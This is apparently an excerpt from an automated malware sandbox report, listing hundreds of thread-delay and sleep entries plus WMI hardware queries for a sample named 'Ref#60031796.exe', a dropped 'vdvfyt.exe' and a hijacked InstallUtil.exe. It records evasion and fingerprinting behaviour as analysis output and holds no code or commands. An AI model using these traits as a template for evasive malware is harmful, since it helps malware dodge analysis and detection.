                      Source: C:\Users\user\Desktop\Ref#60031796.exeWindow / User API: threadDelayed 2807Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeWindow / User API: threadDelayed 7020Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2035Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5033Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeWindow / User API: threadDelayed 7361Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeWindow / User API: threadDelayed 2430Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep count: 35 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 6448Thread sleep count: 2807 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -99890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -99781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 6448Thread sleep count: 7020 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -99671s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -99562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -99453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -99343s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -99204s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -99069s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -98953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -98840s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -98734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -98625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -98515s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -98406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -98296s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -98187s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -98078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -97968s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -97859s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -97750s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -97640s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -97531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -97421s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -97312s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -97203s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -97093s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -96984s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -96874s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -96712s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -96603s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -96484s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -96368s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -96250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -96139s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -96031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -95921s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -95812s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -95702s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -95593s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -95484s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -95371s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -95265s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -95156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -95046s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -94937s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -94828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exe TID: 4928Thread sleep time: -94718s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 524Thread sleep count: 2035 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 524Thread sleep count: 5033 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -99766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -99656s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -99547s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -99436s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -99327s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -99219s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -99094s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -98982s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -98873s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -98762s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -98656s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -98547s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -98437s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -98328s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -98219s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -98094s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -97984s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -97875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -97765s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -97656s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -97546s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -97437s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -97328s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -97219s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -97109s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -97000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -96891s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -96766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -96641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -96479s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -96274s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -96143s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -96005s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -95891s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -95781s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3060Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep count: 37 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5112Thread sleep count: 7361 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5112Thread sleep count: 2430 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -99765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -99641s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -99531s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -99422s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -99313s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -99203s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -99094s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -98985s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -98874s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -98765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -98656s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -98542s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -98430s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -98313s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -98202s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -98094s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -97953s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -97844s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -97703s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -97594s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -97484s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -97360s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -97250s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -97140s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -97031s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -96922s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -96813s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -96703s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -96594s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -96485s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -96360s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -96235s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -96110s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -95985s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -95860s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -95735s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -95610s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -95485s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -95360s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -95235s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -95110s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -94985s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -94860s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -94735s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -94610s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 5756Thread sleep time: -94485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 99890Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 99781Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 99671Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 99562Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 99453Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 99343Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 99204Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 99069Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 98953Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 98840Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 98734Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 98625Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 98515Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 98406Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 98296Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 98187Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 98078Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 97968Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 97859Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 97750Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 97640Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 97531Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 97421Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 97312Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 97203Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 97093Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 96984Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 96874Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 96712Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 96603Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 96484Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 96368Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 96250Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 96139Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 96031Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 95921Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 95812Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 95702Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 95593Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 95484Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 95371Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 95265Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 95156Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 95046Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 94937Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 94828Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 94718Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99436Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99327Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98982Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98873Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98762Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97984Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97765Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97546Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97109Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96479Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96274Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96143Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96005Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 100000Jump to behavior
